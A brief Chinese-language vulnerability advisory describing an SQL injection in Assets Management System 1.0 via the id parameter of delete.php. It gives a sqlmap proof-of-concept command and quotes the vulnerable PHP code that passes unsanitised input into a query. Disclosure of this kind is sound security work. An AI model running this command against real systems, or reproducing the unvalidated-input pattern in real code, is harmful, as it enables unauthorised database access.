描述
Assets Management System 1.0 存在 SQL 注入漏洞,通过 delete.php 中的 id 参数触发。
PoC
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

代码审查(delete.php)
<?php include 'core/init.php';
$id = $_GET['id'];
delete_data($con,$id);
header('location:home.php');
变量 $id 没有经过任何验证或清理。这意味着用户提供的任何值作为 id 参数,都将直接用于 SQL 查询中。